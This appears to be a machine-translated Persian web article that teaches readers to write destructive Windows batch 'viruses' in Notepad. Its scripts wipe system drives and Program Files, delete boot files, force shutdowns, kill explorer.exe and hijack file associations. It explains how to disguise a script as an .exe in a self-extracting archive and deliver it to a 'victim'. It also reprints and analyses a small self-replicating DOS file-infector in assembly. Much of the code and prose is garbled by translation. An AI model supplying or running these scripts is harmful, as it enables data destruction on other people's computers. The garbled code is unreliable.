انتخاب سیستم عامل

نحوه ایجاد ویروس های رایانه ای. نوشتن یک ویروس ساده در دفترچه یادداشت. چگونه ویروس ایجاد کنیم

لطفاً فکر نکنید که فقط نویسندگان ویروس نیاز به دانش در مورد نحوه نوشتن ویروس ها دارند! برای اهداف امنیتی رایانه ، از اهمیت کمتری برای کاربران عادی برخوردار نیستند. حتی درک مختصر نحوه نوشتن ویروس در یک نوت بوک به محافظت از رایانه شما در برابر بسیاری از مشکلات کمک می کند.

این یک شکل ویروس است که در یک دفترچه یادداشت معمولی تایپ می شود ، که بخشی از هر سیستم مایکروسافت ویندوز است. اما توجه داشته باشید که به سختی می توان ویروس نامید ، فقط با دستورات سیستم می توان آنها را در قالب .bat ذخیره کرد. برای تغییر پسوندها ، باید سیستم را پیکربندی کنید:

  • باز میکنیم " یک کامپیوتر«
  • ما به بالای فهرست می رویم " سرویس"اگر قابل مشاهده نیست ALT را فشار دهید
  • در این منو ، به « سرویس"انتخاب مورد" تنظیمات پوشه ها«
  • ما به برگه می رویم " چشم انداز"و به دنبال مورد باشید" افزونه ها را برای انواع پرونده های ثبت شده پنهان کنید«
  • حذف می کنیم این مورد را تیک بزنید

در نگاه اول ، اشکالی ندارد - فقط چند کلمه کوتاه دستورالعمل. اما در واقع ، اگر این پرونده را در پوشه سیستم قرار دهید " system32 \\ درایورها و غیره"و آنرا برای راه اندازی بنویسید تا هنگام بوت شدن سیستم شروع به کار کند ، سپس پس از راه اندازی مجدد رایانه ، باز کردن هر برنامه یا انتخاب عملکرد دیگری روی دسک تاپ غیرممکن است. اگر مهارت کار با رجیستری سیستم را ندارید ، تکرار این مراحل توصیه نمی شود!

به جای telnetdrive.bat ، برای اجرای از دستورات ایمن استفاده کنید: Calc (ماشین حساب) ، Taskmgr (مدیر وظیفه) یا Mspaint (برنامه های رنگ)

از کجا شروع کنیم

وقت آن است که یک دستورالعمل کلی کوچک برای "ساخت" چنین پرونده هایی را مطالعه کنید.

  • اول از همه ، ما دفتر را باز می کنیم.
  • دستورات را در آنجا وارد می کنیم ، یعنی ما یک "بدن" از ویروس را در آن ایجاد می کنیم.
  • ما کار خود را صرفه جویی می کنیم پرونده -\u003e ذخیره به عنوان;
  • اکنون باقی مانده است که پسوند پرونده را تغییر دهید . txt بر . خفاش و به جای نام ذخیره شده ، نام مورد استفاده را وارد کنید.

یک ویروس ساده نوشته شده و در پرونده ذخیره می شود. اکنون خوب است که بدانیم چه چیزی در بدن ویروس ذخیره شده در پرونده نوشته شده است.

ما به ترتیب از خط اول می فهمیم:

  1. @ اکوخاموش - بدون این دستور ، همه آنچه که نوشته شده است در صفحه مانیتور نمایش داده می شود.
  2. تاریخ 11.14 - تاریخ ایجاد را نشان می دهد.
  3. اگروجود داشته باشدج:آسمان.خفاشقابل اعتماد و متخصصabc - بررسی وجود فایل sky.bat در درایو C و در صورت عدم وجود آن
  4. کپی کردن٪ 0 c: sky.bat - با تغییر نام پرونده اصلی به sky.bat ، خود را تکرار می کند
  5. Attrib +ساعتج:آسمان.خفاش - پرونده ایجاد شده را از چشم کنجکاو پنهان می کند.
  6. اکوج:آسمان.خفاش \u003e\u003eخودکارخفاش - ویروس به راه اندازی اضافه می شود.
  7. : abc - در صورت وجود ، اجرای برنامه در اینجا انجام می شود.
  1. mDکرک - بسته به هدف سازنده ویروس ، پوشه لازم یا غیرضروری را ایجاد می کند.
  2. mDجدید - چنین پوشه هایی می توانند کل دیسک سخت کاربر را پر کنند.
  3. برچسبE:LUZER - نام درایو منطقی E. را می نویسد. در این مورد ، LUZER.
  4. همکارexe \u003d.mp3 - پسوند .exe با عنوان .mp مرتبط خواهد شد
  5. del c: Program Files / q - هر آنچه در پوشه Program Files بود حذف خواهد شد.
  6. del *. * / q - همه چیز از پوشه ای که ویروس در آن قرار دارد حذف می شود ، به جز پوشه ای که خود ویروس دارد.

به اندازه کافی لذت بردیم ، بیایید در مورد قانون فکر کنیم:

  1. دل٪ 0 - ویروس کارهایی را انجام می دهد و خودش را پاک می کند.

آخرین چیزی که باقی مانده این است که بدانید چگونه آنها آن را پنهان می کنند. فقط با استفاده از بایگانی کننده WinRAR فایل را از پسوند .bat به .exe تغییر شکل دهید. هنگام ایجاد بایگانی ، "ایجاد بایگانی SFX" را علامت گذاری کنید و کادر تأیید "بعد از بسته بندی را اجرا کنید" تنظیم کنید. به طور طبیعی ، آنها نام واقعی را ایجاد می کنند که تحت آن ویروس ایجاد شده است.

سلب مسئولیت

این مقاله برای اهداف آموزشی نوشته شده است و نویسنده مسئولیتی در قبال اقدامات شما ندارد. با احتیاط رفتار کنید و از کار دیگران قدردانی کنید.

نحوه ایجاد ویروس های رایانه ای | کمی تئوری

ویروس های رایانه ای - نوعی نرم افزار مخرب که می تواند کپی هایی از خود ایجاد کند و در کد برنامه های دیگر ، مناطق حافظه سیستم ، بخش های بوت قرار گیرد و نسخه هایی از خود را از طریق کانال های ارتباطی مختلف توزیع کند.

ویروس های رایانه ای طبقه بندی های زیر را دارند:

  • ویروس بوت کنید - ویروس هایی که به بخش بوت دستگاه های ذخیره سازی مانند دیسک های سخت ، درایو های فلش ، فلاپی دیسک ها و غیره نفوذ می کنند و می توانند دسترسی به پرونده ها را مختل کنند.
  • ویروس ها را بایگانی کنید - نوع ویروسی که در پرونده های اجرایی جاسازی شده است (پرونده هایی با پسوند COM و EXE) و بر عملکرد آنها تأثیر منفی می گذارد.
  • ویروس های راه اندازی فایل را بارگیری کنید - ویروس هایی که عملکرد دو نوع ویروس قبلی را ترکیب می کنند.
  • سند ویروس ها - نوعی ویروس که فایل های سیستم های اداری را آلوده می کند. به این نوع "ویروسهای کلان" نیز گفته می شود ، زیرا سیستم با آلوده شدن ماکرو برنامه آلوده می شود.
  • ویروس های شبکه - نوع ویروسی که از طریق استفاده از شبکه رایانه ای گسترش می یابد ، به عنوان مثال خدمات و پروتکل های شبکه.

معروف ترین ویروس در جهان ILOVEYOU نام داشت. در هسته آن ، کاملاً بی ضرر بود ، کرمی که نامه های مردم را اسپم می کرد. با این وجود اخیراً جهان در معرض حملات سایبری قرار گرفته است که باعث شده همه به ایمنی خود فکر کنند. ویروس WannaCry بسیاری از رایانه ها را آلوده کرده و خواستار باج پرداخت 300 دلار بیت کوین شد. با این حال ، برخی از تحلیلگران بر این باورند که این فقط یک آزمایش بود و حمله دیگری در مقیاس بسیار بزرگتر صورت خواهد گرفت و متوجه کاربران اپل خواهد بود.

و با این وجود ، گرچه WannaCry گسترده بود و پول زیادی از آن می گرفت ، اما این یک WinLocker معمولی بود که قابل حذف بود. واقعیت این است که آنها در اکثر بانک ها و شرکت هایی که وقت نکردند این موضوع را بفهمند پول پرداخت کردند و 300 دلار برای آنها ضرر جدی نیست.

ما ویروس های کمیک و موارد دیگر ایجاد می کنیم

بیایید چند ویروس خودمان بسازیم ، که من بررسی آنها را روی کامپیوتر توصیه نمی کنم ، زیرا ممکن است بسیار بد پایان یابد.

کاملاً همه می توانند چنین ویروسی ایجاد کنند ، زیرا ما به نرم افزار تخصصی و غیره نیاز نداریم ، فقط به یک دفترچه یادداشت احتیاج داریم.

بلافاصله باید بگویم که پرونده ما تقریباً در همه موارد ذخیره خواهد شد ، ما در قالب .bat خواهیم بود ، من هر نامی را می نویسم ، اما شما می توانید هر چیزی را بدهید.

همه پرونده ها را حذف کنید

ما این کد را به عنوان anyname.bat ذخیره می کنیم و این پس از شروع ، تمام محتوا حذف می شود.

صفحه آبی مرگ

echo off del٪ systemdrive٪ *. * / f / s / q shutdown -r -f -t 00

ما این کد را در پرونده anyname.vbs ذخیره می کنیم ، توجه داشته باشید که قالب فایل باید .vbs باشد نه bat.

فرمت C ، D ، E را در سه ثانیه درایو می کند

rd / s / q D:
rd / s / q C:
rd / s / q E:

این فایل را به عنوان anyname.bat ذخیره کرده و آن را اجرا کنید. درایوها در سه ثانیه قالب بندی می شوند.

اثر ماتریکس | اثر ماتریکس

echo خاموش
رنگ 02: ترفندها
echo٪ تصادفی ٪٪ تصادفی ٪٪ تصادفی ٪٪ تصادفی ٪٪ تصادفی ٪٪ تصادفی ٪٪ تصادفی ٪٪ تصادفی٪
ترفندهای رفتن

آن را به عنوان anyname.bat ذخیره کرده و اجرا کنید ، برای کامپیوتر شما خطری ندارد.

رایانه خود را خاموش کرده و قابلیت راه اندازی مجدد را غیرفعال کنید

echo off attrib -r -s -hc: autoexec.bat del c: autoexec.bat attrib -r -s -hc: boot.ini del c: boot.ini attrib -r -s -hc: tldr del c: tdlr attrib -r -s -hc: windowswin.ini del c: windowswn.iniecho off خانم * شما آلوده شدید! Shutdown -s -t 7 -c "ویروسی c را به خود اختصاص می دهد: درایو

آن را به عنوان kind.bat ذخیره کنید ، این که بخواهید روی رایانه خود اجرا کنید خطرناک است!

ما پرونده ها را با پرونده های غیر فعال جایگزین می کنیم

این ویروس جایگزین قالبهای زیر خواهد شد (.exe .jpeg .png .mpeg .sys)

echo off Assoc .txt \u003d jpegfile

به عنوان anyname.bat ذخیره کنید و اجرا کنید.

حذف سیستم عامل

echo off Del C: *. * | سال

آن را به عنوان anyname.bat ذخیره کرده و بر روی رایانه شخصی قربانی اجرا کنید.

و این همه امروز است ، با تشکر برای خواندن مقاله و امیدوارم از اطلاعات دریافتی سو استفاده نکنید. اگر ویروس بیشتری می خواهید ، در کامنت بنویسید ، ما این کار را می کنیم! مقاله را در شبکه های اجتماعی خود ذخیره کنید تا گم نشوید.

موفق باشید در زندگی و شما را ببینیم!

"او مدتها در یک بسته سخت و ناخوشایند رانندگی می کرد ، لرزید و لرزید ، بدنش غذا خواست. او نمی فهمید چرا او را که تازه به دنیا آمده بود ، از خانه بیرون انداختند ... سرانجام ، لرزش متوقف شد ، و کسی غریبه بود. و آرشیو ضمیمه نامه را تقریباً باز کرد. یک ویروس جوان کنجکاو ظاهر شد و اولین بخش خود را ایجاد کرد ... "

در این مقاله ، من تجربه خود را با ویروس نویسی به اشتراک می گذارم. اصل اساسی هر ویروس را می توان در چند کلمه خلاصه کرد: بدن ویروس در هنگام اجرای آن به عنوان یک کد و در هنگام آلودگی به عنوان داده تفسیر می شود. انواع مختلفی از ویروس ها و روش های مختلف عفونت وجود دارد. به طور طبیعی ، مکانیسم عملکرد ویروس به سیستم عامل خاص بستگی دارد. به عنوان مثال ویروس هایی وجود دارند که در حالت محافظت شده پردازنده کار می کنند (حداکثر)
امتیازات و آدرس دهی مطلق حافظه). شرکت هایی مانند AVP برای درمان این موارد بسیار وقت و صرف دارند. تنها چیزی که سازندگان آنتی ویروس را نجات می دهد تعداد بسیار کمی از ویروس های حرفه ای است.

برای اینکه یاد بگیرید چگونه خودتان ویروس بنویسید ، فقط باید اصول مونتاژ را بدانید. منظورم این است که ، با دانش اولیه می توانید ویروس های خود را بنویسید و در مورد ویروس های موجود تحقیق کنید. سایر موارد مفید و گاه لازم
دانش شما هنگام مطالعه آفرینش های دیگران به دست خواهد آمد. از منابع مربوط به این موضوع ، می توانم صفحه ای حاوی تعداد زیادی کتاب و مقاله را توصیه کنم:
http://vx.netlux.org/lib_rus.shtml.
تمام اسناد او بسیار قابل فهم و در دسترس است
زبان همچنین یک مجله الکترونیکی معروف Infected Voice وجود دارد. این یک سیستم ناوبری مناسب دارد که به شما امکان می دهد از مواد جدید (منابع و مقالات) استفاده کنید. این مجله هر نیم سال یکبار منتشر می شود (حداقل قبلاً چنین بود ، اکنون مطمئن نیستم) و شامل تمام نوآوری های این حوزه است.

فرض کنید منشا ویروس را پیدا کرده اید و می خواهید آن را بررسی کنید. چگونه انجامش بدهیم؟ صادقانه بگویم ، این اولین بار است که خودم با چنین مشکلی روبرو می شوم. سوال من اینگونه شد: متن ویروسی وجود دارد ، من می خواهم ببینم چگونه کار می کند ، و در عین حال از آن می ترسم! این کاملاً واقعی است: چه چیزی مانع از سوزاندن CMOS این ویروس ها یا مالیدن پیچ من می شود؟ جواب: هیچی با اقدامات اشتباه شما ، ویروس می تواند به شما آسیب برساند که برنامه ریزی شده است. با این حال ، الگوریتم اقدامات صحیح کاملاً ساده است. حالا ما آن را کشف خواهیم کرد.

فرض خواهیم کرد که منبع ویروس به زبان اسمبلی نوشته شده است. این زبان برای نوشتن ویروس ایده آل است. همانطور که می دانید ، در
اسمبلر ، فقط دو دستور وجود دارد که "واقعی" (به معنای کنش هایی که می توانند تولید کنند) را فراخوانی می کنند
تغییرات برگشت ناپذیر روی دیسک سخت یا هرجای دیگر) اینها "INT" و "OUT" است ، همه دستورات دیگر با رجیسترهای پردازنده و پرچمها کار می کنند (البته نه خام ، اما به طور کلی صحیح). ما توابع WIN API را در نظر نمی گیریم ، زیرا در اصل می توان آنها را جایگزینی برای وقفه های DOS دانست و فراخوانی آنها جایگزینی برای دستور است
"INT".

کمی کمک به مبتدیان یا کسانی که مدت زیادی است در ACM چیزی ننوشته اند: از دستور "INT" برای فراخوانی وقفه های DOS یا BIOS استفاده می شود و از دستور "OUT" برای نوشتن داده ها در پورت استفاده می شود. در این حالت ، برای دستور "INT" ، شماره عملکرد در رجیستر AH نشان داده می شود (اغلب) ، و
برای دستور "OUT" ، ثبت های AL ، AX ، EAX داده های نوشته شده در پورت را ذخیره می کند.

بنابراین. هر اشکال زدایی را انجام دهید. از ابتدا شما باید ویروس های تحت DOS را درک کنید (آنها هنوز هم تحت کار هستند
Win) ، هر اشکال زدایی انجام می دهد: Turbo Debugger از Borland Inc. ، CodeView از MicroSoft ، AFDPRO یا AVPUTIL. بعد ، منبع را در اشکال زدا بارگیری کرده و مرحله به مرحله ردیابی کنید. نکته اصلی این است که فقط به یک قانون پایبند باشید. می توان آن را طلایی نامید.
توجه: می توانید کد منبع ویروس خود را با خیال راحت اجرا کنید ، اما به محض رسیدن به دستورات "OUT" یا "INT" بلافاصله متوقف شده و تجزیه و تحلیل را شروع کنید.

شما باید تجزیه و تحلیل کنید:

  • تعداد پورت قطع یا ضبط شده به نام
  • تعداد عملکرد یا داده های فراخوانی شده در پورت.

برای اینکه عملکرد واقعی این دستورات را بفهمید ، از Tech Help یا از هرگونه اتصال در ASM یا هرگونه دیگری استفاده کنید
کتاب. نکته اصلی این است که در منبع خود می توانید اطلاعات مربوط به تمام وقفه ها و پورت ها را پیدا کنید.
بنابراین می توانید بفهمید چه کاری انجام خواهد داد
دستور زیر را بدون اجرای آن در رایانه خود اجرا کنید. در هنگام ردیابی ، تمام داده ها را ثبت کنید (حالت ثبت ، آدرس فرمان ، داده در
توابع و غیره نامیده می شود) روی یک قطعه کاغذ. سپس با فراخوانی تابع (یا نوشتن در پورت) ، شما کاملاً مسلح شده و قادر خواهید بود تعیین کنید که اگر دستور زیر را اجرا کنید ، چه اتفاقی می افتد. همچنین به شما در تجزیه و تحلیل مقایسه ای تغییرات در ثبت ها و پرچم ها کمک می کند.

بعد از اینکه متوجه شدید این یا آن دستور چه کاری انجام می دهد ("INT" یا "OUT") ، آن را رد کنید و حرکت کنید تا جایی که ادامه دهید
انتهای پرونده یا دستور بعدی در نتیجه ، هر ویروسی را در قفسه ها مرتب کرده و عملکرد آن را درک خواهید کرد.

بیایید به یک مثال نگاه کنیم. همانطور که ویروس کوچکی را نوشتم که توسط برخی از Reminder نوشته شده است. من آن را از شماره یازدهم Infected Voice گرفتم. او بدون اظهار نظر در آنجا بود ، بنابراین مجبور شد همه کارها را خودش انجام دهد. من چه
جذب شده در این ایجاد: کد منبع بسیار کوچک ، اندازه بسیار کوچک الگوریتم اجرایی قابل اجرا ، غیرقابل درک (در نگاه اول). در اینجا کد منبع آن وجود دارد (اتفاقاً REM22 نامیده می شود):

مدل ریز
کد
.استارت آپ
شروع کنید:
pop cx
سلام:
xchg ax، bx
db 108h shr 1
db 4eh؛ دس سی
db 9eh shr 1
db 3ch ؛ cmp al ، xx
db 100h shr 1
db 40h
ماسک db "*. *" ، 0
اقامت
cwd
Mov dl ، al
shl dx ، 1
int 21h
jmp سلام
پایان

به نظر من ، این ویروس یک شاهکار است ، زیرا با چنین اندازه کوچکی
سازماندهی یک مکانیزم تولید مثل یک کار نبوغی است. وقتی اکنون او را تحلیل می کنیم که چه کاری و چگونه انجام می دهد ، همه چیز
در جای خود قرار خواهد گرفت در ضمن ، باید توجه داشت: در اصل ، این ویروس هیچگونه عمل تخریبی انجام نمی دهد (من فکر می کنم تولید مثل را نمی توان به این ترتیب در نظر گرفت) ، اما همه پرونده ها را آلوده می کند
در همان دایرکتوری موجود در آن. این یک ویروس "حرفه ای" نیست ، یعنی فاقد بسیاری از مکانیسم های خلاقیت های جدی است:

  • هیچ مکانیسم "دوست / دشمن" وجود ندارد (ویروس همه را بی رویه آلوده می کند ، حتی خودش یا اشیای قبلاً آلوده).
  • آلودگی فقط پرونده هایی را در همان دایرکتوری با آن رخ می دهد (سعی کنید آن را کامپایل کرده و در پوشه ای که در کنار آن است اجرا کنید)
    کسی وجود ندارد :))؛
  • ویروس چند شکل نیست (خود را رمزگذاری نمی کند و کد خود را تغییر نمی دهد) ؛
  • ویروس اقدامات تخریبی انجام نمی دهد.
  • ویروس ساکن حافظه نیست.

بیایید نگاهی به داخل خود بیندازیم
غلبه کردن منبع یک مدل برای ایجاد یک فایل exe است. ".startup" یک دستورالعمل TASM است "، و بدون آن می توانید کار کنید ، اما سپس باید" org 100h "را بنویسید ، و سپس برچسب را قرار دهید (و
در پایان ، پس از "پایان" ، نام برچسب را قرار دهید). بقیه دستورات را می توانید به راحتی در هر کتابی پیدا کنید و ببینید چه کاری انجام می دهند (تنبل نباشید). فقط باید فهمید که این تیم ها به طور کلی چه کار می کنند.

این شاهکار یک چرخه معمولی است که 6 بار تکرار می شود. چه اتفاقی می افتد؟ آنچه اتفاق می افتد این است که ما int را 21h با شش عملکرد مختلف (93 ، 4E ، 3C ، 40 ، 2E ، 00) صدا می کنیم. ما نگاه می کنیم
به ترتیب به معنی:

"pop cx" فقط برای صفر کردن cx است (همانطور که می دانید در بالای پشته ، در ابتدای برنامه صفر است). برای چی؟ و بدین ترتیب که با دستور SUB CH (نگاه کنید ، باید در خطایاب 108 ساعت باشد) CH \u003d 01 دریافت کنید (در جبران 2Ah (این جایی در PSP است) ، FFh همیشه دروغ است) ، لازم نیست خودنمایی کنید و فقط sub ch ، ffh را بنویسید ، اما این کد برنامه را تغییر می دهد ... به نظر می رسد:
*. * ، 0 \u003d زیر CH ، و این یک ماسک آماده برای جستجو است ... اینجاست که نابغه !!!

یعنی sub ch ، ffh "Ae" است (در کدهای ASCII با فاصله در انتها). بعلاوه ، هر آنچه از افست 101 (کد 93) به جبران 10B (کد 00) می رود FUNCTIONS FOR int 21h است! آنهایی که این 6 تابعی است که ما به نوبه خود به صورت حلقه ای فراخوانی می کنیم (به اعداد آنها در بالا مراجعه کنید) ، و کدی که بدست می آید فقط تینزل است. این کاملاً حس ندارد! وقتی کارکردها در یک قرارداد جمع می شود ، چنین بوده است. یعنی اگر TANAT بنویسم ، به دنباله ای از دستورات تبدیل می شود ، درست است؟ اما این اساساً داده است ... اگرچه در این برنامه نمی توانید آن را داده بنامید ، این فقط FUNCTIONS برای int 21h است ، این همان چیزی است که
نبوغ !!! منطقی نیست که بیشتر توضیح دهیم - زیرا در هر یک از شش چرخه یک تابع فراخوانی می شود ، بنابراین همه ثبت ها تقریباً هستند
مطابق با ایده آل ها ... نگاه کنید:

اولین بار 93h به این تابع گفته می شود: Pipe (خطا) - برای خود برنامه ، هیچ بارگذاری را انجام نمی دهد ، هیچ کاری را مفید نمی کند ، این فقط بیش از حد است ، لازم نیست ، این یک چرخه اضافی است ، اما حساب کاربری این فقط نبوغ کد است ، من نمی توانم از او بیایم !!! یک عملکرد دیگر از این دست "چپ" وجود دارد - به زیر مراجعه کنید.

دوم: 4Eh - این همان چیزی است که شما نیاز دارید! یک فایل را جستجو کنید و در زمان تماس ، جابجایی ماسک پرونده (108 ساعت) در dx است !!!

سوم: 3Ch - ایجاد پرونده. این یکی دیگر از عملکردهای "چپ" است. نیازی به آن نداریم. نیازی به ایجاد پرونده نداریم (به هر حال ، فقط باید خودمان را در فایلی که در مرحله قبل پیدا کردیم بنویسیم). در DX نوعی زباله چپ وجود دارد ، البته با
نام پرونده کاری برای انجام دادن ندارد ، بنابراین CF \u003d 1 و به حلقه بعدی می رویم.

چهارم: 40 ساعت - نوشتن در پرونده. اما این همان چیزی است که ما در حال حاضر به آن نیاز داریم! DX شامل جبران 100 ساعت است (یعنی ابتدای REM22) ، اما CX کمی شکست خورد - برابر 400 ساعت است ، یعنی در واقع به ابتدای فایل پیدا شده است
400 ساعت بایت نوشته خواهد شد ، در حالی که REM22 فقط 22 بایت طول می کشد ، یعنی 1002 بایت اضافی نوشته خواهد شد. درست است. اما با توجه به نبوغ کد :) ، قابل بخشش است.

پنجم: 2Eh - تأیید پرچم را تنظیم کنید. این تابع LEFT است ، در اینجا به سادگی - ضمیمه برنامه است.

ششم: 00 ساعت - به نظر می رسد این یک خروج از برنامه است (من هم نمی دانستم).

این همه: یعنی ما 6 چرخه داریم که فقط 3 چرخه معنی دار است: جستجو ، ضبط و خروج.
به احتمال زیاد شما نخواهید بود
پويانتو برای کشف کردن ، منبع را در اشکال زدا بارگیری کنید ، ردیابی کنید ، نگاه کنید
در مورد داده های دولتی در ثبت ، به نظرات من نگاه کنید. آن وقت همه چیز مشخص خواهد شد. سرانجام
من یک جدول اشکال زدایی می دهم تا شما خودتان آن را کامپایل نکنید (برای یک چیز و ببینید که چگونه باید به نظر برسد). در اصل ، باید کافی باشد ،
برای درک آنچه در این ویروس اتفاق می افتد ، اما من فکر می کنم نظرات مفید خواهد بود.

ADR کد ASM 1 2 3 4 5 6
100 59 POP CX CX \u003d 0 - - - - -
101 93 XCHG AX ، BX AX \u003d BX \u003d 0 AX \u003d 0 ، BX \u003d 9300 ساعت AX \u003d 9300 ساعت ، BX \u003d 0 AX \u003d 0 ، BX \u003d 0005 ساعت AX \u003d 0005 ساعت ، BX \u003d 0400 ساعت AX \u003d 0400 ساعت ، BX \u003d 2E00 ساعت
102 84 4E 4F تست B + 4Fh ،
CL		 - - - - - -
105 3C 80 CMP AL ،
80 ساعت		 - - - - - -
107 40 INC AX AX \u003d 0001 ساعت AX \u003d 0001 ساعت AX \u003d 9301 ساعت AX \u003d 0001 ساعت AX \u003d 0006 ساعت AX \u003d 0401 ساعت
108 2A 2E 2A 00 SUB CH ، B CX \u003d 0100 ساعت CX \u003d 0200 ساعت CX \u003d 0300 ساعت CX \u003d 0400 ساعت CX \u003d 0500 ساعت CX \u003d 0600 ساعت
10 درجه سانتیگراد آگهی LODSW (DS: SI-\u003e AX) AX \u003d DS:
100 \u003d 9359 ساعت		 AX \u003d DS:
102 \u003d 4E84h		 AX \u003d DS:
104 \u003d 3C4Fh		 AX \u003d DS:
106 \u003d 4080 ساعت		 AX \u003d DS:
108 \u003d 2E2Ah		 AX \u003d DS:
10A \u003d 002Ah
10D 99 CWD (DX \u003d E (AX)) DX \u003d FFFFh DX \u003d 0000 ساعت DX \u003d 0000 ساعت DX \u003d 0000 ساعت DX \u003d 0000 ساعت DX \u003d 0000 ساعت
10E 8A D0 MOV DL ، AL DX \u003d FF59h DX \u003d 0084 ساعت DX \u003d 004Fh DX \u003d 0080 ساعت DX \u003d 002Ah DX \u003d 002Ah
110 D1 E2 SHL DX ، 1 DX \u003d FEB2h DX \u003d 0108 ساعت DX \u003d 009Eh DX \u003d 0100 ساعت DX \u003d 0054 ساعت DX \u003d 0054 ساعت
112 سی دی 21 INT 21 ساعت AH \u003d 93 (لوله) - خطا ق \u003d 4E
(FindFirst)		 AH \u003d 3C (ایجاد پرونده) AH \u003d 40 (نوشتن پرونده) AH \u003d 2E (SetVerifyFlag) AH \u003d 00 (خاتمه)
114 EB EB JMP SHORT 101 ??? - - - ??? -

به اندازه کافی عجیب و غریب ، اما اطلاعات در مورد نحوه ایجاد ویروس نه تنها مورد توجه نوابغ رایانه و برنامه نویسان هوشمند بلکه کاربران عادی یک رایانه شخصی نیز قرار دارد. بعضی اوقات افراد انتقام جویانه مایلند با ایجاد یک نرم افزار مخرب به قربانی آسیب برسانند ، اما بیشتر اوقات ، این فقط یک شوخی سایبرنتیک است. هرگونه نفوذ اشخاص ثالث به کامپیوتر یا صدمه عمدی به نرم افزار توسط قوانین بسیاری از کشورها مجازات می شود. این مقاله در مورد چگونگی ساختن ویروس فقط می تواند برای درک کاربر از نحوه استفاده از دستورات Windows NT استفاده شود.

ایجاد ویروس

هر کاربر مبتدی PC می تواند ویروس رایانه ای خود را ایجاد کند. برای این کار داشتن دانش در زمینه برنامه نویسی اصلاً ضروری نیست. برای درک ساده ترین دستورات و البته یک رایانه کافی است که یک میل ، کمی وقت آزاد داشته باشید. در این مقاله نحوه ایجاد ویروس در Notepad آموزش داده می شود. در این حالت ، ما بدون مفسرهای مختلف کار خواهیم کرد ، کد در محیط های توسعه ویژه قرار داده نمی شود. ماهیت این روش چیست؟ برنامه (ویروس) ما با تبدیل یک فایل متنی به یک فایل دسته ای ویندوز با پسوند (* .bat) اجرا می شود. پس از شروع آن ، همه رویدادهایی که در پرونده اجرایی تعیین می کنید ، اجرا می شوند. اکنون شما به صورت تئوری نحوه ایجاد ویروس را می دانید ، سپس می توانید به مطالعه دقیق تری در مورد این موضوع بپردازید. من می خواهم به شما هشدار دهم که این ویروس ها برای موارد جدی نیستند. اگرچه آنها می توانند به رایانه آسیب برسانند ، اما مقیاس فاجعه اندک است. شما قادر به سرقت اطلاعات از قربانی نخواهید بود ، حتی کمتر او را ردیابی کنید. اکنون زمان آن است که نحوه ایجاد ویروس را به شما نشان دهیم. برای انجام این کار ، من به شما توصیه می کنم نحوه استفاده از دستورات مدیریت Windows NT را بیاموزید ، که برخی از آنها در زیر شرح داده خواهد شد. یک ویرایشگر متن معمولی باز کنید و دستور زیر را در آن تایپ کنید:echo خاموش.

تبریک می گویم ، شما صفحه پیشرفت را غیرفعال کرده اید. اکنون ، پس از راه اندازی ویروس شما ، قربانی از پیشرفت کد مخرب اطلاع نخواهد داشت ، زیرا کل روند از چشم او پنهان خواهد شد. بعد ، در یک خط جدید ، کد زیر را تایپ کنید:٪ SystemRoot٪ / system32 / rundll32 user32، \u200b\u200bSwapMouseButton\u003e nul.

توضیح هر دستور منطقی نیست ، اما ماهیت آن این است که اکنون دکمه های ماوس به ترتیب معکوس برنامه ریزی می شوند (انتساب دکمه ها برعکس شده است). اکنون این فایل را ذخیره کرده و پسوند آن را تغییر دهید (* .txt را با * .bat جایگزین کنید). این یک فایل دسته ای از ویندوز است که باعث می شود پس از راه اندازی ، موس شما دچار اختلال شود. شما یک مثال خوب در مورد نحوه ایجاد ویروس دارید ، و اگر علاقه مند هستید ، می توانید به مطالعه این نوع دستورات ادامه دهید و بیشتر در این مکان جستجو کنید. اگر می خواهید قربانی خود را به طور جدی بترسانید ، می توانید خطوطی از این دست را اضافه کنید:

taskkill / f / im explorer.exe\u003e \u200b\u200bnul
خاموش کردن -r -t 1 -c "lol" -f\u003e nul

خط اول فرایند "explorer.exe" را غیرفعال می کنید و خط بعدی - فقط کامپیوتر را دوباره راه اندازی کنید. وظیفه شما این است که از خط جدید دستورات جدیدی را به ویروس خود اضافه کنید ، سپس پرونده را ذخیره کرده و پسوند آن را تغییر دهید. شما تقریباً یک هکر هستید. حالا بیایید این پرونده را به قربانی برسانیم. شما باید فایل ایجاد شده را با پسوند bat در یک بایگانی ویژه SFX قرار دهید ، قبلاً مورد "اجرا بعد از بسته بندی" را انتخاب کرده اید. اکنون کامپیوتر قربانی پس از باز کردن بایگانی به طور خودکار به این ویروس آلوده می شود. فقط برای ارسال "هدیه" ما باقی مانده است.

همه چیز از قبل اختراع شده است

اما اگر برنامه نویسان و هکرهای باتجربه زندگی ما را بسیار ساده کرده اند چرا باید چرخ را از نو اختراع کنیم؟ در دامنه عمومی ، می توانید به راحتی برنامه ای به نام "Virus Generator" Kuzya "پیدا کنید. نیازی به نوشتن دستی تمام دستورات نیست. فقط باید اقدام مورد نظر را انتخاب کنید و برنامه به طور مستقل این پرونده مخرب را برای شما ایجاد می کند.

ایجاد ساده ترین ویروس ها به هیچ محیط توسعه خاصی احتیاج ندارد. و اتفاقاً دانش خاص هم هست. ایجاد ویروس با استفاده از خط فرمان بسیار آسان است. برای این کار باید کمی نحو خط فرمان را بشناسید و بتوانید فایل های bat را ایجاد کنید.

پرونده .bat چیست و چگونه می توانم آن را ایجاد کنم؟

در سطح بسیار سطحی ، اینها پرونده هایی با پسوند .bat هستند. این پرونده ها حاوی دستوراتی هستند که باید توسط مفسر دستور Windows اجرا شوند. تمام آن دستوراتی که می توانند در پنجره خط فرمان اجرا شوند می توانند در پرونده .bat وارد شده و اجرا شوند. نتیجه همان خواهد بود.

برای ایجاد ویروس .bat ، به یک ویرایشگر متن منظم نیاز داریم. در حالت ایده آل ، دفترچه یادداشت برای این منظور مناسب است. پس از ایجاد و باز کردن یک سند متنی جدید ، باید کدی (دستوراتی) را که باید در آنجا اجرا شود وارد کنید. پس از آن ، باید از منو استفاده کنید ذخیره به عنوانبا دادن نامی به پسوند ، این فایل را ذخیره کنید بات و تعیین نوع پرونده تمام فایل های.

ما ساده ترین ویروس را ایجاد می کنیم

در این مقاله ، ما چگونگی ایجاد ویروسی را بررسی خواهیم کرد که پس از راه اندازی ، یک پنجره خط فرمان بی وقفه باز می کند. بازشدن بی نهایت و بسیار سریع پنجره های خط فرمان به کاربر اجازه نمی دهد با آرامش کار کند. هیچ کس وقت ندارد که همه آنها را ببندد و خیلی زود RAM کامپیوتر را مسدود می کند ، که به نوبه خود سرعت کامپیوتر را تا حد زیادی مسدود می کند. چیزی شبیه به این خواهد بود:

